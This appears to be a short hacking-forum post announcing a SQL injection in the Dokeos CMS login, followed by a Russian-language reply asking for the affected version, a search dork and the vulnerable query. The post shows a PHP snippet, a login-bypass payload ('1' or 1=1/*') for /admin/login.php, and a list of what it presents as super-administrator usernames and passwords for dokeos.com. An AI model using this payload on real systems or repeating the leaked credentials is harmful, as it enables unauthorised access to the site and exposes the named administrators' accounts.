Dokeos CMS Warning: magic_quotes_gpc = off -------------------------------------- Site: dokeos.com [PR=6] Status: Free -------------------------------------- Vuln: /claro_init_local.inc.php PHP: ............ if(isset($_POST['login']) && isset($_POST['password'])) // $login && $password are given to log in { $login = $_POST['login']; $password = $_POST['password']; ............. -------------------------------------- Exploit: /admin/login.php PHP: Your login : 1' or 1=1/* Your password : x3kpass -------------------------------------- Super Administrators: Code: yannick:adminPassword thomas:upsi24lon jwarnier:cisco123 ZAMUT (c)
Подверженная версия, дорк и уязвимый запрос пожалста (ты указал только объявление переменных, но не показал где и как они попадают в запрос).
